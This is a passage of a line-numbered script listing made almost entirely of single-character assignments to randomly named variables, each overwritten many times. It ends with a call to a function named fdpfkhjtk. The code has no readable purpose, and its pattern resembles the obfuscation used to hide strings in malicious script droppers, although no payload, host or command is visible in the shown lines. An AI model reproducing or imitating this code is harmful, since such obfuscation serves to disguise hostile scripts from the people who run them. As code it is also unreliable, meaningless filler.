739 | vlxjybe = "u"; | |
740 | vlxjybe = "I"; | |
741 | vlxjybe = "h"; | |
742 | vlxjybe = "o"; | |
743 | vlxjybe = "y"; | |
744 | vlxjybe = "F"; | |
745 | vlxjybe = "M"; | |
746 | vlxjybe = "C"; | |
747 | vlxjybe = "k"; | |
748 | vlxjybe = "l"; | |
749 | vlxjybe = "o"; | |
750 | vlxjybe = "g"; | |
751 | vlxjybe = "X"; | |
752 | vlxjybe = "P"; | |
753 | vlxjybe = "x"; | |
754 | vlxjybe = "S"; | |
755 | vlxjybe = "V"; | |
756 | vlxjybe = "V"; | |
757 | vlxjybe = "L"; | |
758 | vlxjybe = "r"; | |
759 | vlxjybe = "o"; | |
760 | vlxjybe = "Z"; | |
761 | vlxjybe = "I"; | |
762 | vlxjybe = "C"; | |
763 | vlxjybe = "E"; | |
764 | vlxjybe = "w"; | |
765 | vlxjybe = "a"; | |
766 | vlxjybe = "v"; | |
767 | vlxjybe = "k"; | |
768 | vlxjybe = "d"; | |
769 | tglaub = "j"; | |
770 | tglaub = "b"; | |
771 | tglaub = "a"; | |
772 | tglaub = "u"; | |
773 | tglaub = "Z"; | |
774 | tglaub = "a"; | |
775 | tglaub = "v"; | |
776 | tglaub = "v"; | |
777 | tglaub = "m"; | |
778 | tglaub = "g"; | |
779 | tglaub = "e"; | |
780 | tglaub = "x"; | |
781 | tglaub = "U"; | |
782 | tglaub = "s"; | |
783 | tglaub = "u"; | |
784 | tglaub = "Z"; | |
785 | tglaub = "M"; | |
786 | tglaub = "A"; | |
787 | tglaub = "I"; | |
788 | tglaub = "U"; | |
789 | tglaub = "A"; | |
790 | tglaub = "P"; | |
791 | tglaub = "t"; | |
792 | tglaub = "R"; | |
793 | tglaub = "b"; | |
794 | vfriulaun = "G"; | |
795 | vfriulaun = "l"; | |
796 | vfriulaun = "-"; | |
797 | aaafyzcn = "J"; | |
798 | aaafyzcn = "p"; | |
799 | aaafyzcn = "u"; | |
800 | aaafyzcn = "X"; | |
801 | aaafyzcn = "k"; | |
802 | aaafyzcn = "J"; | |
803 | aaafyzcn = "f"; | |
804 | aaafyzcn = "D"; | |
805 | aaafyzcn = "U"; | |
806 | aaafyzcn = "v"; | |
807 | gbcxcncxr = "j"; | |
808 | gbcxcncxr = "S"; | |
809 | gbcxcncxr = "U"; | |
810 | gbcxcncxr = "Z"; | |
811 | gbcxcncxr = "p"; | |
812 | gbcxcncxr = "P"; | |
813 | gbcxcncxr = "A"; | |
814 | gbcxcncxr = "F"; | |
815 | gbcxcncxr = "n"; | |
816 | gbcxcncxr = "s"; | |
817 | gbcxcncxr = "Y"; | |
818 | gbcxcncxr = "p"; | |
819 | gbcxcncxr = "p"; | |
820 | gbcxcncxr = "u"; | |
821 | gbcxcncxr = "w"; | |
822 | gbcxcncxr = "s"; | |
823 | gbcxcncxr = "S"; | |
824 | gbcxcncxr = "I"; | |
825 | gbcxcncxr = "y"; | |
826 | gbcxcncxr = "K"; | |
827 | gbcxcncxr = "Z"; | |
828 | gbcxcncxr = "u"; | |
829 | gbcxcncxr = "E"; | |
830 | gbcxcncxr = "p"; | |
831 | gbcxcncxr = "l"; | |
832 | gbcxcncxr = "V"; | |
833 | gbcxcncxr = "A"; | |
834 | gbcxcncxr = "G"; | |
835 | gbcxcncxr = "b"; | |
836 | gbcxcncxr = "T"; | |
837 | gbcxcncxr = "o"; | |
838 | gbcxcncxr = "K"; | |
839 | gbcxcncxr = "m"; | |
840 | gbcxcncxr = "b"; | |
841 | gbcxcncxr = "A"; | |
842 | gbcxcncxr = "N"; | |
843 | gbcxcncxr = "X"; | |
844 | gbcxcncxr = "T"; | |
845 | gbcxcncxr = "h"; | |
846 | gbcxcncxr = "I"; | |
847 | gbcxcncxr = "H"; | |
848 | chwyptit = "f"; | |
849 | chwyptit = "O"; | |
850 | chwyptit = "D"; | |
851 | chwyptit = "S"; | |
852 | chwyptit = "M"; | |
853 | chwyptit = "v"; | |
854 | chwyptit = "h"; | |
855 | chwyptit = "i"; | |
856 | chwyptit = "P"; | |
857 | chwyptit = "S"; | |
858 | chwyptit = "L"; | |
859 | chwyptit = "V"; | |
860 | chwyptit = "j"; | |
861 | chwyptit = "l"; | |
862 | chwyptit = "G"; | |
863 | chwyptit = "n"; | |
864 | chwyptit = "M"; | |
865 | chwyptit = "M"; | |
866 | chwyptit = "B"; | |
867 | chwyptit = "U"; | |
868 | chwyptit = "v"; | |
869 | chwyptit = "q"; | |
870 | chwyptit = "f"; | |
871 | chwyptit = "."; | |
872 | cstaxi = "Q"; | |
873 | cstaxi = "v"; | |
874 | cstaxi = "G"; | |
875 | cstaxi = "r"; | |
876 | cstaxi = "V"; | |
877 | cstaxi = "j"; | |
878 | cstaxi = "s"; | |
879 | cstaxi = "I"; | |
880 | cstaxi = "d"; | |
881 | cstaxi = "B"; | |
882 | cstaxi = "Z"; | |
883 | cstaxi = "H"; | |
884 | cstaxi = "z"; | |
885 | cstaxi = "c"; | |
886 | cstaxi = "W"; | |
887 | cstaxi = "L"; | |
888 | cstaxi = "S"; | |
889 | cstaxi = "S"; | |
890 | cstaxi = "p"; | |
891 | cstaxi = "p"; | |
892 | cstaxi = "3"; | |
893 | bhxzt = "v"; | |
894 | bhxzt = "x"; | |
895 | bhxzt = "W"; | |
896 | bhxzt = "a"; | |
897 | bhxzt = "I"; | |
898 | bhxzt = "z"; | |
899 | bhxzt = "J"; | |
900 | bhxzt = "w"; | |
901 | bhxzt = "x"; | |
902 | bhxzt = "h"; | |
903 | bhxzt = "C"; | |
904 | bhxzt = "J"; | |
905 | bhxzt = "k"; | |
906 | bhxzt = "X"; | |
907 | bhxzt = "g"; | |
908 | bhxzt = "f"; | |
909 | bhxzt = "f"; | |
910 | bhxzt = "T"; | |
911 | bhxzt = "m"; | |
912 | bhxzt = "l"; | |
913 | bhxzt = "i"; | |
914 | bhxzt = "E"; | |
915 | bhxzt = "x"; | |
916 | bhxzt = "S"; | |
917 | bhxzt = "C"; | |
918 | bhxzt = "B"; | |
919 | bhxzt = "k"; | |
920 | bhxzt = "q"; | |
921 | bhxzt = "B"; | |
922 | bhxzt = "R"; | |
923 | bhxzt = "x"; | |
924 | bhxzt = "m"; | |
925 | bhxzt = "Y"; | |
926 | bhxzt = "s"; | |
927 | bhxzt = "l"; | |
928 | bhxzt = "E"; | |
929 | bhxzt = "P"; | |
930 | bhxzt = "C"; | |
931 | bhxzt = "h"; | |
932 | bhxzt = "R"; | |
933 | bhxzt = "B"; | |
934 | bhxzt = "g"; | |
935 | bhxzt = "c"; | |
936 | bhxzt = "I"; | |
937 | bhxzt = "h"; | |
938 | lqylr = "K"; | |
939 | lqylr = "l"; | |
940 | lqylr = "a"; | |
941 | lqylr = "T"; | |
942 | lqylr = "s"; | |
943 | lqylr = "o"; | |
944 | lqylr = "H"; | |
945 | lqylr = "t"; | |
946 | lqylr = "A"; | |
947 | lqylr = "l"; | |
948 | lqylr = "f"; | |
949 | lqylr = "V"; | |
950 | lqylr = "b"; | |
951 | lqylr = "M"; | |
952 | lqylr = "J"; | |
953 | lqylr = "A"; | |
954 | lqylr = "O"; | |
955 | lqylr = "K"; | |
956 | lqylr = "B"; | |
957 | lqylr = "A"; | |
958 | lqylr = "I"; | |
959 | lqylr = "b"; | |
960 | lqylr = "K"; | |
961 | lqylr = "C"; | |
962 | lqylr = "v"; | |
963 | lqylr = "I"; | |
964 | lqylr = "C"; | |
965 | lqylr = "X"; | |
966 | lqylr = "H"; | |
967 | lqylr = "j"; | |
968 | lqylr = "N"; | |
969 | lqylr = "s"; | |
970 | lqylr = "e"; | |
971 | lqylr = "U"; | |
972 | lqylr = "n"; | |
973 | lqylr = "n"; | |
974 | lqylr = "p"; | |
975 | lqylr = "V"; | |
976 | lqylr = "u"; | |
977 | lqylr = "x"; | |
978 | lqylr = "s"; | |
979 | lqylr = "Y"; | |
980 | lqylr = "E"; | |
981 | lqylr = "&"; | |
982 | erahil = "k"; | |
983 | erahil = "n"; | |
984 | erahil = "H"; | |
985 | erahil = "w"; | |
986 | erahil = "g"; | |
987 | erahil = "n"; | |
988 | erahil = "c"; | |
989 | erahil = "a"; | |
990 | erahil = "o"; | |
991 | erahil = "m"; | |
992 | erahil = "r"; | |
993 | mqfutkpce = "u"; | |
994 | mqfutkpce = "d"; | |
995 | mqfutkpce = "I"; | |
996 | mqfutkpce = "D"; | |
997 | mqfutkpce = "A"; | |
998 | mqfutkpce = "o"; | |
999 | mqfutkpce = "I"; | |
1000 | mqfutkpce = "F"; | |
1001 | mqfutkpce = "B"; | |
1002 | mqfutkpce = "E"; | |
1003 | mqfutkpce = "l"; | |
1004 | mqfutkpce = "n"; | |
1005 | mqfutkpce = "Z"; | |
1006 | mqfutkpce = "k"; | |
1007 | mqfutkpce = "I"; | |
1008 | mqfutkpce = "D"; | |
1009 | mqfutkpce = "Q"; | |
1010 | mqfutkpce = "g"; | |
1011 | mqfutkpce = "P"; | |
1012 | mqfutkpce = "Z"; | |
1013 | mqfutkpce = "e"; | |
1014 | mqfutkpce = "8"; | |
1015 | bbzcfyp = "q"; | |
1016 | bbzcfyp = "A"; | |
1017 | bbzcfyp = "x"; | |
1018 | bbzcfyp = "f"; | |
1019 | bbzcfyp = "R"; | |
1020 | bbzcfyp = "J"; | |
1021 | bbzcfyp = "y"; | |
1022 | bbzcfyp = "B"; | |
1023 | bbzcfyp = "k"; | |
1024 | bbzcfyp = "k"; | |
1025 | naunf = "j"; | |
1026 | naunf = "k"; | |
1027 | naunf = "N"; | |
1028 | naunf = "m"; | |
1029 | ujampim = "k"; | |
1030 | ujampim = "o"; | |
1031 | ujampim = "y"; | |
1032 | ujampim = "E"; | |
1033 | ujampim = "T"; | |
1034 | ujampim = "o"; | |
1035 | ujampim = "x"; | |
1036 | ujampim = "L"; | |
1037 | ujampim = "O"; | |
1038 | ujampim = "o"; | |
1039 | ujampim = "f"; | |
1040 | ujampim = "t"; | |
1041 | ujampim = "q"; | |
1042 | ujampim = "p"; | |
1043 | ujampim = "s"; | |
1044 | ujampim = "p"; | |
1045 | ujampim = "g"; | |
1046 | ujampim = "m"; | |
1047 | ujampim = "y"; | |
1048 | ujampim = "d"; | |
1049 | ujampim = "b"; | |
1050 | ujampim = "P"; | |
1051 | ujampim = "c"; | |
1052 | ujampim = "l"; | |
1053 | ujampim = "Z"; | |
1054 | ujampim = "V"; | |
1055 | ujampim = "H"; | |
1056 | ujampim = "M"; | |
1057 | ujampim = "b"; | |
1058 | ujampim = "X"; | |
1059 | ujampim = "c"; | |
1060 | ujampim = "d"; | |
1061 | ujampim = "M"; | |
1062 | ujampim = "Q"; | |
1063 | ujampim = "V"; | |
1064 | ujampim = "e"; | |
1065 | ujampim = "P"; | |
1066 | ujampim = "S"; | |
1067 | ujampim = "u"; | |
1068 | ujampim = "z"; | |
1069 | ujampim = "2"; | |
1070 | lstbbnsig = "W"; | |
1071 | lstbbnsig = "k"; | |
1072 | lstbbnsig = "Z"; | |
1073 | lstbbnsig = "M"; | |
1074 | lstbbnsig = "h"; | |
1075 | lstbbnsig = "m"; | |
1076 | lstbbnsig = "Y"; | |
1077 | lstbbnsig = "A"; | |
1078 | lstbbnsig = "q"; | |
1079 | lstbbnsig = "O"; | |
1080 | lstbbnsig = "A"; | |
1081 | lstbbnsig = "u"; | |
1082 | lstbbnsig = "w"; | |
1083 | lstbbnsig = "u"; | |
1084 | lstbbnsig = "x"; | |
1085 | lstbbnsig = "U"; | |
1086 | lstbbnsig = "D"; | |
1087 | lstbbnsig = "l"; | |
1088 | lstbbnsig = "G"; | |
1089 | lstbbnsig = "U"; | |
1090 | lstbbnsig = "Z"; | |
1091 | lstbbnsig = "d"; | |
1092 | lstbbnsig = "A"; | |
1093 | lstbbnsig = "B"; | |
1094 | lstbbnsig = "k"; | |
1095 | lstbbnsig = "S"; | |
1096 | lstbbnsig = "s"; | |
1097 | lstbbnsig = "t"; | |
1098 | lstbbnsig = "q"; | |
1099 | lstbbnsig = "x"; | |
1100 | lstbbnsig = "n"; | |
1101 | lstbbnsig = "J"; | |
1102 | lstbbnsig = "J"; | |
1103 | lstbbnsig = "o"; | |
1104 | lstbbnsig = "k"; | |
1105 | lstbbnsig = "J"; | |
1106 | lstbbnsig = "p"; | |
1107 | bjyxf = "S"; | |
1108 | bjyxf = "p"; | |
1109 | bjyxf = "K"; | |
1110 | bjyxf = "F"; | |
1111 | bjyxf = "l"; | |
1112 | bjyxf = "J"; | |
1113 | bjyxf = "X"; | |
1114 | bjyxf = "a"; | |
1115 | bjyxf = "j"; | |
1116 | bjyxf = "c"; | |
1117 | bjyxf = "V"; | |
1118 | bjyxf = "Q"; | |
1119 | bjyxf = "L"; | |
1120 | bjyxf = "S"; | |
1121 | bjyxf = "b"; | |
1122 | bjyxf = "F"; | |
1123 | bjyxf = "M"; | |
1124 | bjyxf = "q"; | |
1125 | bjyxf = "o"; | |
1126 | bjyxf = "Z"; | |
1127 | bjyxf = "p"; | |
1128 | bjyxf = "D"; | |
1129 | bjyxf = "m"; | |
1130 | bjyxf = "j"; | |
1131 | bjyxf = "l"; | |
1132 | bjyxf = "i"; | |
1133 | bjyxf = "D"; | |
1134 | bjyxf = "r"; | |
1135 | bjyxf = "I"; | |
1136 | jivnz = "x"; | |
1137 | jivnz = "q"; | |
1138 | jivnz = "z"; | |
1139 | jivnz = "f"; | |
1140 | jivnz = "w"; | |
1141 | jivnz = "S"; | |
1142 | jivnz = "N"; | |
1143 | jivnz = "Z"; | |
1144 | jivnz = "Q"; | |
1145 | jivnz = "h"; | |
1146 | jivnz = "d"; | |
1147 | jivnz = "Q"; | |
1148 | jivnz = "y"; | |
1149 | jivnz = "M"; | |
1150 | jivnz = "o"; | |
1151 | jivnz = "K"; | |
1152 | jivnz = "Z"; | |
1153 | jivnz = "b"; | |
1154 | jivnz = "H"; | |
1155 | jivnz = "E"; | |
1156 | jivnz = "b"; | |
1157 | jivnz = "E"; | |
1158 | jivnz = "D"; | |
1159 | jivnz = "P"; | |
1160 | jivnz = "H"; | |
1161 | jivnz = "e"; | |
1162 | jivnz = "u"; | |
1163 | jivnz = "D"; | |
1164 | jivnz = "s"; | |
1165 | jivnz = "d"; | |
1166 | jivnz = "H"; | |
1167 | jivnz = "R"; | |
1168 | jivnz = "D"; | |
1169 | jivnz = "T"; | |
1170 | jivnz = "F"; | |
1171 | jivnz = "S"; | |
1172 | jivnz = "B"; | |
1173 | jivnz = "M"; | |
1174 | jivnz = "I"; | |
1175 | jivnz = "o"; | |
1176 | jivnz = "g"; | |
1177 | jivnz = "d"; | |
1178 | jivnz = "o"; | |
1179 | jivnz = "e"; | |
1180 | weafz = "u"; | |
1181 | weafz = "O"; | |
1182 | weafz = "H"; | |
1183 | weafz = "v"; | |
1184 | weafz = "g"; | |
1185 | weafz = "h"; | |
1186 | weafz = "Y"; | |
1187 | weafz = "Q"; | |
1188 | weafz = "q"; | |
1189 | weafz = "W"; | |
1190 | weafz = "E"; | |
1191 | weafz = "f"; | |
1192 | weafz = "F"; | |
1193 | weafz = "U"; | |
1194 | weafz = "y"; | |
1195 | weafz = "P"; | |
1196 | dhurm = "H"; | |
1197 | dhurm = "H"; | |
1198 | dhurm = "k"; | |
1199 | dhurm = "t"; | |
1200 | dhurm = "K"; | |
1201 | dhurm = "b"; | |
1202 | dhurm = "e"; | |
1203 | dhurm = "t"; | |
1204 | dhurm = "T"; | |
1205 | dhurm = "y"; | |
1206 | dhurm = "D"; | |
1207 | dhurm = "D"; | |
1208 | dhurm = "X"; | |
1209 | dhurm = "E"; | |
1210 | dhurm = "z"; | |
1211 | dhurm = "A"; | |
1212 | dhurm = "Y"; | |
1213 | dhurm = "v"; | |
1214 | dhurm = "P"; | |
1215 | dhurm = "e"; | |
1216 | dhurm = "R"; | |
1217 | dhurm = "D"; | |
1218 | dhurm = "B"; | |
1219 | dhurm = "M"; | |
1220 | dhurm = "o"; | |
1221 | dhurm = "Z"; | |
1222 | dhurm = "t"; | |
1223 | dhurm = "7"; | |
1224 | ivmsfxsc = "f"; | |
1225 | ivmsfxsc = "g"; | |
1226 | ivmsfxsc = "x"; | |
1227 | ivmsfxsc = "t"; | |
1228 | ivmsfxsc = "e"; | |
1229 | ivmsfxsc = "h"; | |
1230 | ivmsfxsc = "k"; | |
1231 | ivmsfxsc = "H"; | |
1232 | ivmsfxsc = "E"; | |
1233 | ivmsfxsc = "c"; | |
1234 | ivmsfxsc = "E"; | |
1235 | ivmsfxsc = "J"; | |
1236 | ivmsfxsc = "k"; | |
1237 | ivmsfxsc = "f"; | |
1238 | ivmsfxsc = ":"; | |
1239 | gwmgwmeuq = "v"; | |
1240 | gwmgwmeuq = "C"; | |
1241 | gwmgwmeuq = "o"; | |
1242 | gwmgwmeuq = "D"; | |
1243 | gwmgwmeuq = "g"; | |
1244 | gwmgwmeuq = "R"; | |
1245 | gwmgwmeuq = "X"; | |
1246 | gwmgwmeuq = "z"; | |
1247 | gwmgwmeuq = "x"; | |
1248 | gwmgwmeuq = "T"; | |
1249 | gwmgwmeuq = "k"; | |
1250 | gwmgwmeuq = "h"; | |
1251 | gwmgwmeuq = "k"; | |
1252 | gwmgwmeuq = "N"; | |
1253 | gwmgwmeuq = "c"; | |
1254 | gwmgwmeuq = "o"; | |
1255 | gwmgwmeuq = "j"; | |
1256 | gwmgwmeuq = "L"; | |
1257 | gwmgwmeuq = "g"; | |
1258 | gwmgwmeuq = "s"; | |
1259 | mnkzph = "q"; | |
1260 | mnkzph = "t"; | |
1261 | mnkzph = "x"; | |
1262 | mnkzph = "v"; | |
1263 | mnkzph = "M"; | |
1264 | mnkzph = "9"; | |
1265 | kuvocb = "Y"; | |
1266 | kuvocb = "f"; | |
1267 | kuvocb = "p"; | |
1268 | kuvocb = "w"; | |
1269 | kuvocb = "b"; | |
1270 | kuvocb = "H"; | |
1271 | kuvocb = "G"; | |
1272 | kuvocb = "B"; | |
1273 | kuvocb = "H"; | |
1274 | kuvocb = "B"; | |
1275 | kuvocb = "q"; | |
1276 | kuvocb = "k"; | |
1277 | kuvocb = "K"; | |
1278 | kuvocb = "Z"; | |
1279 | kuvocb = "a"; | |
1280 | kuvocb = "B"; | |
1281 | kuvocb = "U"; | |
1282 | kuvocb = "x"; | |
1283 | kuvocb = "t"; | |
1284 | kuvocb = "v"; | |
1285 | kuvocb = "g"; | |
1286 | kuvocb = "m"; | |
1287 | kuvocb = "h"; | |
1288 | kuvocb = "S"; | |
1289 | fuhito = "D"; | |
1290 | fuhito = "x"; | |
1291 | fuhito = "i"; | |
1292 | fuhito = "M"; | |
1293 | fuhito = "s"; | |
1294 | fuhito = "q"; | |
1295 | fuhito = "h"; | |
1296 | fuhito = "p"; | |
1297 | fuhito = "L"; | |
1298 | fuhito = "Y"; | |
1299 | fuhito = "m"; | |
1300 | fuhito = "E"; | |
1301 | fuhito = "V"; | |
1302 | fuhito = "_"; | |
1303 | czscarq = "P"; | |
1304 | czscarq = "J"; | |
1305 | czscarq = "G"; | |
1306 | czscarq = "a"; | |
1307 | czscarq = "K"; | |
1308 | czscarq = "V"; | |
1309 | czscarq = "p"; | |
1310 | czscarq = "B"; | |
1311 | czscarq = "u"; | |
1312 | yljtjjl = "K"; | |
1313 | yljtjjl = "j"; | |
1314 | yljtjjl = "w"; | |
1315 | yljtjjl = "b"; | |
1316 | yljtjjl = "x"; | |
1317 | yljtjjl = "E"; | |
1318 | yljtjjl = "s"; | |
1319 | yljtjjl = "P"; | |
1320 | yljtjjl = "g"; | |
1321 | yljtjjl = "Y"; | |
1322 | yljtjjl = "q"; | |
1323 | wzyse = "Q"; | |
1324 | wzyse = "S"; | |
1325 | wzyse = "e"; | |
1326 | wzyse = "M"; | |
1327 | wzyse = "H"; | |
1328 | wzyse = "p"; | |
1329 | wzyse = "V"; | |
1330 | wzyse = "k"; | |
1331 | wzyse = "Y"; | |
1332 | wzyse = "p"; | |
1333 | wzyse = "Z"; | |
1334 | wzyse = "u"; | |
1335 | wzyse = "k"; | |
1336 | wzyse = "v"; | |
1337 | wzyse = "H"; | |
1338 | wzyse = "q"; | |
1339 | wzyse = "5"; | |
1340 | nfdddcss = "z"; | |
1341 | nfdddcss = "h"; | |
1342 | nfdddcss = "k"; | |
1343 | nfdddcss = "e"; | |
1344 | nfdddcss = "g"; | |
1345 | nfdddcss = "f"; | |
1346 | nfdddcss = "q"; | |
1347 | nfdddcss = "f"; | |
1348 | tmdxhr = "e"; | |
1349 | tmdxhr = "D"; | |
1350 | tmdxhr = "A"; | |
1351 | tmdxhr = "U"; | |
1352 | tmdxhr = "P"; | |
1353 | tmdxhr = "X"; | |
1354 | tmdxhr = "V"; | |
1355 | tmdxhr = "I"; | |
1356 | tmdxhr = "P"; | |
1357 | tmdxhr = "x"; | |
1358 | tmdxhr = "e"; | |
1359 | tmdxhr = "f"; | |
1360 | tmdxhr = "N"; | |
1361 | tmdxhr = "v"; | |
1362 | tmdxhr = "m"; | |
1363 | tmdxhr = "S"; | |
1364 | tmdxhr = "f"; | |
1365 | tmdxhr = "R"; | |
1366 | tmdxhr = "K"; | |
1367 | tmdxhr = "k"; | |
1368 | tmdxhr = "c"; | |
1369 | tmdxhr = "X"; | |
1370 | tmdxhr = "W"; | |
1371 | tmdxhr = "Y"; | |
1372 | tmdxhr = "A"; | |
1373 | tmdxhr = "\""; | |
1374 | toulst = "N"; | |
1375 | toulst = "t"; | |
1376 | toulst = "j"; | |
1377 | toulst = "K"; | |
1378 | toulst = "I"; | |
1379 | toulst = "i"; | |
1380 | toulst = "K"; | |
1381 | toulst = "k"; | |
1382 | toulst = "k"; | |
1383 | toulst = "a"; | |
1384 | toulst = "R"; | |
1385 | toulst = "v"; | |
1386 | toulst = "l"; | |
1387 | toulst = "q"; | |
1388 | toulst = "G"; | |
1389 | toulst = "h"; | |
1390 | toulst = "H"; | |
1391 | toulst = "a"; | |
1392 | toulst = "v"; | |
1393 | toulst = "e"; | |
1394 | toulst = "H"; | |
1395 | toulst = "V"; | |
1396 | toulst = "l"; | |
1397 | toulst = "i"; | |
1398 | toulst = "d"; | |
1399 | toulst = " "; | |
1400 | bctaaj = "U"; | |
1401 | bctaaj = "q"; | |
1402 | bctaaj = "l"; | |
1403 | bctaaj = "t"; | |
1404 | bctaaj = "u"; | |
1405 | bctaaj = "b"; | |
1406 | bctaaj = "S"; | |
1407 | bctaaj = "M"; | |
1408 | bctaaj = "G"; | |
1409 | bctaaj = "a"; | |
1410 | bctaaj = "l"; | |
1411 | bctaaj = "F"; | |
1412 | bctaaj = "s"; | |
1413 | bctaaj = "h"; | |
1414 | bctaaj = "e"; | |
1415 | bctaaj = "P"; | |
1416 | bctaaj = "n"; | |
1417 | bctaaj = "H"; | |
1418 | bctaaj = "U"; | |
1419 | bctaaj = "N"; | |
1420 | bctaaj = "N"; | |
1421 | bctaaj = "s"; | |
1422 | bctaaj = "t"; | |
1423 | bctaaj = "E"; | |
1424 | bctaaj = "t"; | |
1425 | bctaaj = "K"; | |
1426 | bctaaj = "Z"; | |
1427 | bctaaj = "y"; | |
1428 | bctaaj = "o"; | |
1429 | bctaaj = "R"; | |
1430 | bctaaj = "v"; | |
1431 | bctaaj = "i"; | |
1432 | bctaaj = "q"; | |
1433 | bctaaj = "M"; | |
1434 | bctaaj = "r"; | |
1435 | bctaaj = "p"; | |
1436 | bctaaj = "U"; | |
1437 | bctaaj = "R"; | |
1438 | bctaaj = "d"; | |
1439 | bctaaj = "e"; | |
1440 | bctaaj = "R"; | |
1441 | bctaaj = "r"; | |
1442 | bctaaj = "A"; | |
1443 | bctaaj = "4"; | |
1444 | fdpfkhjtk ( ); |
|